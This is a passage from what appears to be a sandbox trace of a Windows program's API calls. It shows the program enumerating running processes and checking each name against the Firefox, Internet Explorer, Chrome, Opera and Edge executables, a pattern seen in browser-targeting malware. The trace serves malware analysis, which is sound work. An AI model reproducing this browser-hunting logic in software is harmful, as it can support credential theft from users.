szExeFile="taskhost.exe")) returned 1 [0205.594] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0205.594] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0205.594] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0205.594] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0205.594] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.594] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.595] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.595] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.595] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.595] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.595] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.595] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0205.595] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0205.595] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0205.595] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0205.595] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0205.595] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.595] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0205.596] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0205.596] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0205.596] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0205.596] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0205.596] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.596] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0205.596] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0205.596] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0205.596] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0205.596] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0205.596] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.596] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0205.597] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0205.597] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0205.597] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0205.597] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0205.597] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.597] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0205.598] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0205.598] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0205.598] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0205.598] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0205.598] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.598] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0205.598] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0205.598] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0205.598] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0205.598] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0205.598] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.598] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0205.599] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0205.599] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0205.599] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0205.599] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0205.599] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.599] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0205.599] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0205.599] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0205.599] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0205.599] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0205.599] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.599] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0205.600] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0205.600] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0205.600] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0205.600] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0205.600] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.600] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0205.600] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0205.600] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0205.601] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0205.601] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0205.601] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.601] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0205.601] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0205.601] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0205.601] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0205.601] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0205.601] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.601] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0205.602] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0205.602] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0205.602] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0205.602] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0205.602] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.602] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0205.602] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0205.602] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0205.602] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0205.602] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0205.602] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.602] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0205.603] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0205.603] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0205.603] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0205.603] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0205.603] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.603] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0205.603] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0205.603] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0205.604] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0205.604] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0205.604] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.604] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0205.604] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0205.604] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0205.604] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0205.604] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0205.604] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.604] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0205.605] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0205.605] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0205.605] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0205.605] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0205.605] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.605] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0205.605] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0205.605] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0205.605] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0205.605] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0205.605] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.605] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0205.606] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0205.606] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0205.606] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0205.606] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0205.606] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.606] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0205.606] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0205.606] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0205.606] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0205.606] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0205.606] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.607] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0205.607] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0205.607] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0205.607] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0205.607] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0205.607] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.607] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0205.608] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0205.608] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0205.608] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0205.608] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0205.608] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.608] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.608] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0205.608] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0205.608] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0205.608] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0205.608] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.608] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.609] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.609] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.609] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.609] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.609] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.609] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0205.609] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0205.609] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0205.609] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0205.609] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0205.609] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.609] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.610] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.610] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.610] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.610] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.610] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.610] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0205.610] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0205.610] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0205.610] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0205.610] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0205.611] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.611] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.611] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0205.611] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0205.611] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0205.611] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0205.611] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.611] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.612] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.612] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.612] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.612] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0205.612] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.612] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0205.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0205.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0205.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0205.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0205.612] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.612] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.613] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0205.613] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0205.613] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0205.613] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0205.613] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0205.613] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.613] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.613] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.613] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.613] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0205.614] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.614] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.614] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.614] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.614] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.614] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0205.614] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.614] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0205.615] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0205.615] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0205.615] lstrcmpiA (lpString1="explorer.exe", 